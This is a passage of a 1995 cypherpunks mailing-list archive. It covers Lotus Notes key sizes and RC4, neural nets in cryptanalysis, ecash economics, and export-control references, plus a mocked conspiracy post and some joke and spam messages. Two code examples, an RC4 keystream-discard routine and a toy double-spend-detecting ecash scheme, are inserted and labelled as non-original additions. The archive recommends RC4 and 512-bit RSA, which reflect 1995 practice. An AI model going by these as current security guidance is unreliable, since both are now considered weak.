  makes it radioactive.

I must admit that I don't know what it is that he is referring to.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charlie Kaufman/Iris <Charlie_Kaufman/Iris.IRIS@iris.com>
Date: Sat, 11 Nov 1995 00:59:09 +0800
To: bglassle <bglassle@kaiwan.com>
Subject: Re: Lotus Notes RSA Implementation Question
Message-ID: <9511102035.AA6927@moe.iris.com>
MIME-Version: 1.0
Content-Type: text/plain


>If anyone on the list has knowledge of the following items, I would be
>very grateful.
>
>1)  What is the key size used by the USA licensed version?
>
Notes V3 (the one currently deployed) uses 512 bit RSA keys in both the USA
and exportable versions. Notes V4 (currently in Beta) uses 512 bit RSA keys for
encryption in the exportable version and bigger keys for signatures in all
versions and for encryption in the USA version. I'm not sure I'm allowed to say
what the key size will be ahead of the product shipping.

>2)  Considering RC4 is a proprietary scheme, have there been any
>concerted efforts to validate its strength or lack of?  If so, could
>you give a pointer to any documents I could review.
>
There has been considerable discussion of the security of RC4 on this list, and
some subtle (i.e. worrisome but not disastrous) weaknesses have been
found. Lotus Notes' use of RC4 is not subject to the weaknesses disclosed
to date because it does not encrypt recognizable plaintext with the first few
bytes of the RC4 stream.

>...Bob Glassley
>

 --Charlie Kaufman
 (charlie_kaufman@iris.com)
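
One way to keep recognizable plaintext away from the first bytes of an RC4 stream, shown as an added example (not Lotus Notes code and not part of the original message): discard an initial run of keystream before encrypting. The message does not say how Notes achieves this; the discard length of 256, the function names and the sample header are assumptions.

```python
def rc4_keystream(key: bytes, n: int, drop: int = 0) -> bytes:
    """Return n keystream bytes, skipping the first `drop` bytes of output."""
    if not 1 <= len(key) <= 256:
        raise ValueError("RC4 key must be 1..256 bytes")
    # Key scheduling: permute S under control of the key.
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    # Output generation; the first `drop` bytes are produced and thrown away.
    i = j = 0
    out = bytearray()
    for _ in range(drop + n):
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) % 256])
    return bytes(out[drop:])


def rc4_crypt(key: bytes, data: bytes, drop: int = 0) -> bytes:
    """Encrypt or decrypt (same operation) with an optional initial discard."""
    ks = rc4_keystream(key, len(data), drop)
    return bytes(a ^ b for a, b in zip(data, ks))


def exposed_keystream(ciphertext: bytes, known_prefix: bytes) -> bytes:
    """Keystream bytes that anyone who knows the plaintext prefix can read off."""
    return bytes(c ^ p for c, p in zip(ciphertext, known_prefix))


def exposes_initial_keystream(key: bytes, message: bytes,
                              known_prefix: bytes, drop: int) -> bool:
    """True if a known prefix reveals the very first bytes RC4 generates,
    the ones closest to the key schedule."""
    ct = rc4_crypt(key, message, drop)
    first = rc4_keystream(key, len(known_prefix))
    return exposed_keystream(ct, known_prefix) == first


if __name__ == "__main__":
    key = b"constructed-key"                 # constructed sample key
    header = b"Subject: "                    # constructed, predictable header
    message = header + b"quarterly figures attached"
    for drop in (0, 256):
        print(drop, exposes_initial_keystream(key, message, header, drop))
```

Both ends must agree on the discard length, since decryption regenerates the same shifted keystream.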





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Sat, 11 Nov 1995 03:46:09 +0800
To: tony266@vabeach.email.net
Subject: Re: Yvette
In-Reply-To: <9511101244.S12252920@vabeach.email.net>
Message-ID: <199511101816.LAA02444@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 tony266@vabeach.email.net allegedly wrote:
>
> I'm wondering if Yvette from Smithfield, Va is as fine as most people say she
> is...


Let's play "Find the Topicality"!  Pseudonymity and reputation
generation and propagation?  Text stego?  No..  Hm..



Wait!  I've got it!  Smithfield, Va is in the same state as certain
spook headquarters...


Bryce

signatures follow



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMKOXAPWZSllhfG25AQGFKwP9EeXISObFh+aWcOH5ES+V4c3kZx5OcTgn
q6A30uYMEYQDSGTQsZjY3sa/x+MjdOt7LAQB9LvGqYgamWwLBdQAGC08vA0sUoR/
q+rb3JxgY10TFwG4pTbfjkFaCOMYw8uMD0hxpbtU0MaqGvQuhYJ58RGTGV39va0H
RPJISFM/DQc=
=J0e4
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Fri, 10 Nov 1995 09:31:53 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Market Value of Web Pages
In-Reply-To: <acc79e46010210045c32@[205.199.118.202]>
Message-ID: <199511100143.AA22994@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>>BTW - I don't think we should be talking about a penny/page cost because it
>>is way too high for the current market.  For example, my copy of Applied
>>Cryptography V2 cost about $.067/page AND came with the media to keep it
>>"forever".  My (used) copy of Snow Crash cost closer to a penny/page and
>>also came with the media.  I would think that somewhere between 1/100 to
>>1/10 of a penny/page is closer to the current market value of the page
>>content.

>I expect this to someday change, and to pay for some things at a fraction
>of a cent per hit, some other things for a few cents a hit, and maybe even
>some things at dollars per hit.

The maths of ecash and web pages gets very interesting very quickly. If you
charge per page of a web server, $0.01 a page and you happen to be doing this
on a million-hits-a-day web server then your machine is earning you $10,000 
ecash bucks a day. How much is it to buy hardware and a link and set up
a nice web site everyone wants to visit? If it was left running you'd collect
$3,650,000 ecash bucks annually. That is just for browsing. Sales on top of that
via ecash (very low overheads relative to physical means) would mean very
high profits. 1% of browsers spending US$50 is US$500,000 a day, or per year
it is US$182,500,000. Not bad for an outlay of a couple of fast SPARCs and
a quick net link and some staff to maintain it.

If you toss arguments like this at some of the sites that would be viable for
the hit numbers and then explain the only way that will occur is if the crypto
laws are repealed, you will create a lot more lobbiers annoying their reps
for the cause. ecash without good crypto is like the Federal Reserve
delivering cash with open pickup trucks. Or doing credit card purchases on
postcards.

Cheers,
Mark
mark@lochard.com.au




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Tue, 14 Nov 1995 08:17:24 +0800
To: John Young <cypherpunks@toad.com
Subject: YOU_luz
Message-ID: <199511111824.KAA02105@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 11 Nov 1995 04:35:02 +0800
To: Atp3000@aol.com
Subject: Re: coding and nnet's
Message-ID: <199511101952.LAA24819@ix13.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:17 PM 11/10/95 -0500, Atp3000@aol.com wrote:
>I just recently got interested in coding and cryptography, and I was
>wondering if you could suggest 3 or 4 papers that address the application of
>neural networks in cryptography.

Schneier's 2nd edition says "Neural nets aren't terribly useful for
cryptography, primarily because of the shape of the solution space.  Neural
nets work best for problems that have a continuity of solutions, some better
than others.  This allows a neural net to learn, proposing better and better
solutions as it does.  Breaking an algorithm provides for very little in the
way of learning opportunities:  You either recover the key or you don't.  (At
least this is true if the algorithm is any good.)  Neural nets work well in
structured environments when there is something to learn, but not in the
high-entropy, seemingly random world of cryptography."
And he doesn't give any references.

That's been my opinion of the issue as well; I looked into it a bit when I was
doing a project with the neural net folks back at Bell Labs, partly because
neural net chips typically have lots and lots of parallel bit-sized horsepower.
Unfortunately, the horsepower isn't arranged in ways that are very useful for
crypto;  adding together a large bunch of short chunks of data (maybe using
floating point addition) and thresholding the sum isn't the right thing to do
with highly discontinuous functions.  You could take a similar chip design and
connect the pieces together differently to make a brute-force searcher, i.e.
take a gate array and wire it to do crypto-like calculations, but the neural
net stuff doesn't do that very efficiently.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tony266@vabeach.email.net
Date: Sat, 11 Nov 1995 02:03:53 +0800
To: cypherpunks@toad.com
Subject: Yvette
Message-ID: <9511101244.S12252920@vabeach.email.net>
MIME-Version: 1.0
Content-Type: text/plain


I'm wondering if Yvette from Smithfield, Va is as fine as most people say she
is...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 13 Nov 1995 11:56:20 +0800
To: an237621@anon.penet.fi
Subject: Re: Yvette
In-Reply-To: <199511101201.MAA00215@gears.efn.org>
Message-ID: <Pine.SOL.3.91.951110125015.10954B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 10 Nov 1995 an237621@anon.penet.fi wrote:

> : tony266@vabeach.email.net allegedly wrote:
> : I'm wondering if Yvette from Smithfield, Va is as fine as most people say she
> : is...
> Yes, there is a cow on the lawn.

Y vette when you can have it now.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andreas Bogk <andreas@artcom.de>
Date: Sat, 11 Nov 1995 01:45:44 +0800
To: raph@CS.Berkeley.EDU
Subject: Re: Small keysizes do make sense (was PGP Comment weakens...)
In-Reply-To: <199511091725.JAA17620@kiwi.cs.berkeley.edu>
Message-ID: <m0tDsG2-0002duC@horten>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "Raph" == Raph Levien <raph@CS.Berkeley.EDU> writes:

    Raph> Since RSA decryption is cubic in key size, it takes about
    Raph> twenty times as long to sign or decrypt a message. Since

Actually Sedgewick shows an algorithm that runs in O(N*N*log N). 

Andreas

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAgUBMKNApkyjTSyISdw9AQHSVQP/eUBnTOX/kzZU4/T3w/60mnj0GpT88Saa
qsgLq3N2b2U2lOOmQYE5JGb9FTds/3Hj9kxKMGxmSlyt3nOjgWmAKLJf5AvDMY1Y
MzSVaswzst/EyQYeQBZcUl+ahy3HFLLR8CUMX/IIeJS0w3iJbW4FNsmsTqCf/7Tg
p1Pa+TXQKYk=
=Vrsb
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: j.d.stumbles@reading.ac.uk (John Stumbles)
Date: Fri, 10 Nov 1995 21:47:02 +0800
To: cypherpunks@toad.com
Subject: Re: INFO BLACKOUT _fwd_
Message-ID: <"mail2.readin:061930:951110131700"@reading.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


I saw this on the NZ.general newsgroup and had to share it with the list. 
'fraid it's just the reply - the  original must've expired by the time 
I got there (and I couldn't be bothered to go looking for an archive to 
track it down in).

Enjoy...

>ab330@torfree.net (Bob Allisat) wrote:
>
>
>>Powerful national security insiders have established effective control
>>over the entrance gateways to the Internet. Disturbing signs are now 
>>emerging that the "information superhighway" has been targeted for 
>>systematic surveillance and political dossier-building on Americans'
>>opinions.
>
>	Oh, really?
>
>>SAIC is a $2 billion defense and FBI contractor with a board of
>>directors that reads like a Who's Who of the intelligence community.
>>Board members include Admiral Bobby Ray Inman, the former director of
>>the National Security Agency (NSA) and deputy director of the CIA; Melvin
>>Laird, defense secretary under Richard Nixon; Donald Hicks, former head
>>of research and development for the Pentagon; Donald Kerr, former head
>>of the Los Alamos National Laboratory; and General Maxwell Thurman 
>>(ret.), the commander of the U.S. invasion of Panama.
>
>>The corporation also has a legion of computer network specialists and
>>an entire division of computer consultants. 
>
>		As does IBM, DEC, AT&T, MicroSoft, shall I go on?
>
>>SAIC currently holds contracts
>>for re-engineering the Pentagon's information systems, automating the
>>FBI's computerized fingerprint identification system, and building a
>>national criminal history and information system.
>
>	Nope, I believe that's DISA's job now (was DCA)
>
>>The Internet is a marvel of computer software technology. It was designed
>>to survive a nuclear attack on the United States--like the Post Office,
>>it's literally smart enough to find a way to get the mail through even if
>>most of the network is missing.
>
>	Wow, TCP/IP is a marvel?  this guy must hate Novell.
>
>>But control of the Internet domain name registration means the ability
>>to remove troublesome--or outspoken--computer systems from the network.
>>Potentially, this control also confers the power to insinuate "phantom"
>>domains into the network--for surveillance purposes, for example,--or
>>for real-time, automatic censorship.
>	So the government can wipe out all nameservers at once?  This is
>getting better....
>
>>Furthermore, anecdotal evidence gathered by this author (Matthews)
>>suggests that actual "truth control" is taking place on the net now.
>>E-mail messages with controversial contents--including details of the
>>SAIC takeover of domain names--have consistently disappeared as they
>>travel across the network. News items concerning the Vincent Foster
>>"suicide" investigation and allegations of NSA bank spying through
>>compromised Inslaw software are being quickly and automatically 
>>cancelled. And the cancellations are not by their authors.
>
>	Must be a bad MX server somewhere.
>
>>With domain names under the control of secret government insiders, it
>>is even theoretically possible that large parts of the Internet could
>>be shut down and silenced at critical times. This could be accomplished
>>by suddenly altering domain name registration or interposing compromised 
>>"domains" at critical points. These compromised systems could serve as
>>"black holes" at critical times, stopping e-mail and important news
>>from reaching the world -- or the rest of the country.
>
>	Well that means we'll just have to use IP addresses, right?
>
>>Exercises in "turning the Internet off" have already taken place in
>>Taiwan and Hong Kong. In Taiwan the 'net was successfully shut down.
>>All network traffic--including news, opinions, and e-mail sent by computer
>>users was successfully "bottled up" on the island and prevented from
>>reaching the world.
>
>		It sure is easy to cut an island off, but a continent or more?
>
>>In Hong Kong the Internet wasn't quite strangled, but the British
>>authorities who control that colony managed to throttle free electronic speech
>>with the rest of the world until everything was bottlenecked into a few
>>little-known satellite links.
>
>>These are alarming precedents and sure signs that powerful, shadowy
>>forces are preparing to chop at the very roots of America's new Liberty
>>Tree. The secretive people on the board of directors of SAIC are
>>intelligence professionals skilled at manufacturing events--and then 
>>manufacturing public opinion and consent by controlling the truth. Will 
>>Internet disinformation, censorship or "shutdowns" signal the next American
>>crisis?
>
>	So, you basically said that the government is willing to cripple
>itself by shutting down the Internet and MILNET.  This guy needs a
>kick in the teeth or something to wake him up.  Next thing you know is
>that he'll claim to be abducted by CIA agents posing as Elvis
>impersonators.  And he'll start believing Elvis still lives.
>
>		-Dale
>

John Stumbles                                      j.d.stumbles@reading.ac.uk
Computer Services, University of Reading       http://www.rdg.ac.uk/~suqstmbl 
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tony266@vabeach.email.net
Date: Sat, 11 Nov 1995 03:55:39 +0800
To: cypherpunks@toad.com
Subject: This is for YOU...
Message-ID: <9511101324.S12358809@vabeach.email.net>
MIME-Version: 1.0
Content-Type: text/plain


Yvette...  Didn't LL Cool J make a song about you..."Dear yvette"...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David.Y@freedomnet.com (David Y)
Date: Sat, 11 Nov 1995 03:00:15 +0800
To: cypherpunks@toad.com
Subject: mailing list.
Message-ID: <8160284964304@.freedomnet.com>
MIME-Version: 1.0
Content-Type: text/plain



Please put me on your mailing list, thanks.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: turner@TeleCheck.com
Date: Sat, 11 Nov 1995 04:16:00 +0800
To: tony266@vabeach.email.net
Subject: Re: Yvette
In-Reply-To: <9511101244.S12252920@vabeach.email.net>
Message-ID: <9511101938.AA17624@mercury.telecheck.com>
MIME-Version: 1.0
Content-Type: text/plain


> I'm wondering if Yvette from Smithfield, Va is as fine as most people say she
> is...

The chair is against the wall and the deer eats her beef jerky
savagely.

Greeting Comrade, I am glad to have finally been activated.  My first
order is to kill the person(s) who activated me.  Sorry tony, but
you must die.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Sat, 11 Nov 1995 06:50:37 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Online ITAR and AECA; Bibliography of export control books
Message-ID: <9511102207.AA29317@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> >    Where can one get a copy of ITAR? Secondly, has anyone written any 
> > books on the subject and if so who and what?

The ITAR is a regulation, not a law.  You can find it via my crypto
export control page at http://www.cygnus.com/~gnu/export.html under
"State Department export guidance".  Or at
ftp://ftp.cygnus.com/pub/export/itar.in.full.  It's 380 kbytes
(but ignorance of it is no excuse!).

That regulation is authorized by the Arms Export Control Act (AECA), a
law (22 USC Sec. 2778).  The law is also available in the same places.
It's only 40 Kbytes.

I own and can recommend several books on export controls.

Layman's books on general export controls and technology policy issues:

90-26801:   Finding common ground : U.S. export controls in a changed
     global environment /  Washington, D.C. : National Academy Press, 1991.
     xviii, 390 p. : ill. ; 24 cm.
     LC CALL NUMBER: HF1414.5 .F56 1991

87-34877:   Technology transfer : a policy model / Philip A. Roberts.
     Washington, DC : National Defense University Press, 1988.  xiii, 86 p.
     ; 21 cm.  LC CALL NUMBER: HC110.T4 R62 1988 SERIES TITLE: A National
     security essay DEWEY DEC: 338.973/06 dc19

93-50697:   Silencing science : national security controls and scientific
     communication / Harold C. Relyea.  Norwood, NJ : Ablex Pub., c1994. 
     xvii, 248 p. ; 23 cm.  LC CALL NUMBER: Q223 .R45 1994.  
     SERIES TITLE: Information management, policy, and services.
     DEWEY DEC:  338.97306 dc20.  ISBN:  156750096X; 1567500978 (pbk.)

Lawyer's Tome on export controls, with detailed case citations and such:

91-37498: Root, William A.  United States export controls /  3rd ed.
     Englewood Cliffs, NJ : Prentice Hall Law & Business, c1991-  1 v.
     (loose-leaf) : ill. ; 26 cm.  ISBN:  0139529381
     LC CALL NUMBER: KF1987 .L54 1990.  DEWEY DEC:  353.0082/76 dc20
     [This one is loose-leaf and gets annual updates at $80/year.  I forget
      how much it cost originally.]

By the way, if you're trying to find general references on export
controls or crypto, or anything else, I recommend
`telnet://locis.loc.gov' and searching the Library of Congress card
catalog or the copyright records.  The user interface is IBM mainframe
oriented, but the information is without peer.

	John Gilmore





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Atp3000@aol.com
Date: Sat, 11 Nov 1995 04:07:48 +0800
To: cypherpunks@toad.com
Subject: coding and nnet's
Message-ID: <951110141713_18585763@mail04.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


cypherpunks!
I just recently got interested in coding and cryptography, and I was
wondering if you could suggest 3 or 4 papers that address the application of
neural networks in cryptography.
Thanks, I really appreciate your time and consideration!
Atp3000




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 11 Nov 1995 04:19:13 +0800
To: Atp3000@aol.com
Subject: Re: coding and nnet's
In-Reply-To: <951110141713_18585763@mail04.mail.aol.com>
Message-ID: <199511101936.OAA21643@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Atp3000@aol.com writes:
> cypherpunks!
> I just recently got interested in coding and cryptography, and I was
> wondering if you could suggest 3 or 4 papers that address the application of
> neural networks in cryptography.
> Thanks, I really appreciate your time and consideration!

I personally know of none. I'm not sure how one would apply neural
networks to cryptography, frankly, or even what use one might imagine
making of them.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kawika Daguio <KDAGUIO@aba.com>
Date: Sat, 11 Nov 1995 04:34:58 +0800
To: Cypherpunks@toad.com
Subject: SPAM:E-CA$H Conference SF 11/16-17
Message-ID: <s0a3753c.047@aba.com>
MIME-Version: 1.0
Content-Type: text/plain


COMMERCIAL - SPAM ALERT -

I will be speaking at a conference on Electronic Money
that might interest some of you sitting on some extra real Money
who also suffer from the burning desire to find out what 
ideas and technology other folks are flogging on the talk-circuit.

The brochure is too long to type in but some excerpts follow:

      10 key questions to be answered at this 
       critical industry event:
       
       10.  What are the biggest avenues to entry into the world
            of electronic commerce?
        9.  Who will be the biggest users of electronic money?
        8.  Who should be allowed to issue E-cash?
        7.  How will debit and checking fit in with the electronic
            money future?
        6.  How do you balance privacy, security, and efficiency in 
            E-cash systems?
        5.  How can electronic commerce be used for a business
            advantage?
        4.  How will the government regulate E-cash?
        3.  How will electronic payment systems protect against
            fraud?
        2.  What infrastructure is needed to provide security
            on open networks?
        1.  What are the leading technologies that will be used for 
            E-cash?

Speakers:

Ernest Brickell
Bankers Trust Electronic Commerce

Richard K. Crone
Center for Electronic Banking, KPMG Peat Marwick

ME

John Doggett
Bank of Boston

Peter Gemmel
Sandia National Laboratories

Gail Grant
Open Market

Edward Hogan
MasterCard International

Randy Kahn
First Interstate of California

Michael Killen
Killen and Associates

Steve Kimmey
Tandem Computers

Paul Lambert
Barnett Banks

Ron Laurie
McCutchen, Doyle, Brown and Enersen

Scott Loftesness
First Data Corporation

Greg McKenzie
Canadian Imperial Bank of Commerce

B. Clifford Neuman
University of Southern California

Deborah Owen
Arent Fox Kinter Plotkin and Kahn

Daniel Schutzer
Citibank
Financial Services Technology Consortium

Bill Washburn
Mecklermedia

Magdalena Yesil
CyberCash 

Sponsor: IBC USA Conferences

Date:  November 16 - 17

Venue: Pan Pacific Hotel
       500 Post Street
       San Francisco

EMAIL: questions or registrations
       skeyles@ibcusa.com

Phone: 508.481.6400 ext 282 (Sherry)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 11 Nov 1995 07:30:29 +0800
To: cypherpunks@toad.com
Subject: Re: coding and nnet's
Message-ID: <199511102255.OAA10734@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 14:17 11/10/95 -0500, Atp3000@aol.com wrote:
>I just recently got interested in coding and cryptography, and I was
>wondering if you could suggest 3 or 4 papers that address the application of
>neural networks in cryptography.

Perhaps neural nets could be used in an unknown plain text, brute force
attack to automatically select possible decryptions for human examination. 
I don't know of any papers on the subject.

Bill


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Sat, 11 Nov 1995 06:16:21 +0800
To: cypherpunks@toad.com
Subject: Re: ecash speed
In-Reply-To: <199511090508.VAA05884@jobe.shell.portal.com>
Message-ID: <199511102145.QAA06533@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Hal writes:
>This all has to happen whenever you click on a link in your browser.
>Even with fast CPU's I think the extra step of connecting to the bank,
>having it check against all coins, and getting approval will be
>considerable for each link traversal.

A system like Stephen Brands' should significantly improve the
situation.  There's no benefit in double-spending micropayments since
you'll be identified after the fact.  For small enough payments, you
can skip the on-line validation and handle them in batch-mode later.
It becomes a matter of risk management, then.
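
How "identified after the fact" can work, as an added sketch that is not part of the message above and not Brands' actual protocol: a two-generator challenge-response coin in the same spirit, with the bank's blind signature on the coin omitted. The toy group, account secrets and merchant challenges are constructed for the illustration.

```python
import random

# Toy parameters, constructed for this example and far too small for real use:
# P = 2*Q + 1 with P and Q prime; G1 and G2 both generate the subgroup of order Q.
P, Q, G1, G2 = 2039, 1019, 4, 9


def commit(x, y):
    """Return g1^x * g2^y mod P."""
    return pow(G1, x, P) * pow(G2, y, P) % P


class Coin:
    def __init__(self, account_secret, rng):
        self.u = account_secret            # ties the coin to the payer's account
        self.s = rng.randrange(1, Q)       # random value that hides u inside the coin
        self.w1 = rng.randrange(1, Q)      # one-time nonces, fixed at withdrawal
        self.w2 = rng.randrange(1, Q)
        # Public part of the coin: (hidden identity, nonce commitment).
        self.public = (commit(self.u, self.s), commit(self.w1, self.w2))

    def spend(self, challenge):
        """Answer a merchant's challenge. One answer hides u; two answers do not."""
        return ((self.w1 + challenge * self.u) % Q,
                (self.w2 + challenge * self.s) % Q)


def merchant_verify(coin_public, challenge, response):
    """Offline check the merchant runs without contacting the bank."""
    c_id, c_nonce = coin_public
    r1, r2 = response
    return commit(r1, r2) == c_nonce * pow(c_id, challenge, P) % P


class Bank:
    def __init__(self):
        self.accounts = {}   # g1^u -> account name, recorded when the account opens
        self.seen = {}       # coin -> (challenge, response) from its first deposit

    def open_account(self, name, account_secret):
        self.accounts[pow(G1, account_secret, P)] = name

    def deposit_batch(self, transcripts):
        """Settle deposited payments in batch; return the double-spenders' names."""
        caught = []
        for coin_public, c, resp in transcripts:
            if not merchant_verify(coin_public, c, resp):
                continue                   # invalid transcript, rejected
            if coin_public not in self.seen:
                self.seen[coin_public] = (c, resp)
                continue
            c0, resp0 = self.seen[coin_public]
            if (c - c0) % Q == 0:
                continue                   # same transcript deposited twice
            # Two answers on one coin are two points on a line with slope u:
            #   r1 - r1' = (c - c') * u  (mod Q)
            u = (resp[0] - resp0[0]) * pow((c - c0) % Q, -1, Q) % Q
            caught.append(self.accounts.get(pow(G1, u, P), "unknown"))
        return caught


def demo(seed=7):
    rng = random.Random(seed)
    bank = Bank()
    honest_u, cheat_u = 123, 456           # constructed account secrets
    bank.open_account("honest", honest_u)
    bank.open_account("cheat", cheat_u)
    honest_coin, cheat_coin = Coin(honest_u, rng), Coin(cheat_u, rng)
    batch = []
    # Constructed merchant challenges: one spend for the honest coin, two for the other.
    for coin, challenges in ((honest_coin, [311]), (cheat_coin, [17, 900])):
        for c in challenges:
            resp = coin.spend(c)
            assert merchant_verify(coin.public, c, resp)   # each merchant accepts offline
            batch.append((coin.public, c, resp))
    return bank.deposit_batch(batch)


if __name__ == "__main__":
    print("identified at batch deposit:", demo())
```

Every merchant accepts its payment offline; only the later batch deposit exposes the account behind the coin that was spent twice, which is the trade-off the message describes as risk management.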




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 11 Nov 1995 08:18:19 +0800
To: cypherpunks@toad.com
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
Message-ID: <199511102353.PAA15671@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 10 Nov 1995, Peter D. Junger wrote:

> In any case, I want to thank him for doing so, because it brought home
> to me the important fact that it is possible that the ITAR provisions
> relating to cryptographic software could be struck down, not because
> they violate the first amendment, or would violate it if passed by
> congress, and not because the court is trying to dodge the difficult
> first amendment issue, but simply because the provisions are not
> authorized by any legislation.

Hmmm, Peter actually has me worried.  I actually _understood_ what he was
talking about.  And that has me worried.

I guess that reviewing all that LIBOR financing documentation over ten
years ago, when I was extending a helping hand to the CIBC helped.  No one
should ever attempt to figure out what happens when you have an American
highrise owned by a private Canadian citizen, go into receivership with a
syndicated Euro-financing while attempting a head lease to AT&T. 

An experience like that leaves you scarred for life.  You actually learn 
to grok "lawyer speak".

I guess that an interesting follow up occurs, if I perhaps muddy the 
crystal clear waters of Peter's analysis.  It relates to another thread 
on this list, the thread on time-release crypto and the economics of 
information.  

A hypothetical which might clarify by making things murky.

If I ... as a foreign citizen ... a Canadian ... were to release an
algorithm for time-release crypto to another Canadian ... another
foreigner, could I actually be hauled down by the scruff of my neck to
face US style "justice".  Could I be deprived of our Canadian traditions of 
Napoleonic Code and of British Common Law, to face Americanisms.

Does anyone from State have any clarification of this policy-shift??

I find it ridiculous to hear that if I load a series of messages into a
fax machine, and instruct that machine to send out a series of documents
at some set point in time -- and that if I were to *communicate* this
method of time delay cryptographically secure communication to another
Canadian citizen, that I could actually be hauled out of my own country
and dragged across an international border to face charges of treason 
against a state to which I have no allegiance. 

This would be laughable, if it weren't so sinister.  I mean, it's only a 
FAX machine ... for goodness' sake.

Here I am as a Canadian citizen, a citizen of a sovereign State, a state
which has historically been a friend of the American people.  A State
which has actually sacrificed its own international stature and the
security of its citizens, to benefit Americans.  (Most notably, when
Canada rescued the hostages in Iran) and America repays the citizens of
Ambassador Ken Taylor's home town how??  With an implied threat of making
them subject to US law because it's administratively convenient? 

Indeed.

Can't anyone find acts of treason, a little closer to home??

Domestically maybe ... possibly even right under your nose ...

>   It's too far off topic to pursue any further, but I must take
>   exception to the suggestion that we are well served by separation of
>   powers intruding into other legal domains.  Bowsher tells us that
>   causation principles go out the window in SOP cases.  That alone
>   makes it radioactive.

You ain't whistling Dixie.

> I must admit that I don't know what it is that he is referring to.



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eli@GS160.SP.CS.CMU.EDU
Date: Sat, 11 Nov 1995 05:30:33 +0800
To: cypherpunks@toad.com
Subject: Re: Lotus Notes RSA Implementation Question
In-Reply-To: <+cmu.andrew.internet.cypherpunks+kkcsTXG00UfAE0ynIq@andrew.cmu.edu>
Message-ID: <9511102101.AA27849@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <+cmu.andrew.internet.cypherpunks+kkcsTXG00UfAE0ynIq@andrew.cmu.edu>
Charlie Kaufman writes:
>Notes V3 (the one currently deployed) uses 512 bit RSA keys in both
>the USA and exportable versions.

512-bit RSA is exportable?  I'm surprised.  It would be interesting
to CJR a known-secure binary for 512-bit RSA, attempting a little
differential cryptanalysis on the NSA's practices.  A fair test would
require that you have the political clout of Lotus/IBM, though.

--
   Eli Brandt
   eli+@cs.cmu.edu






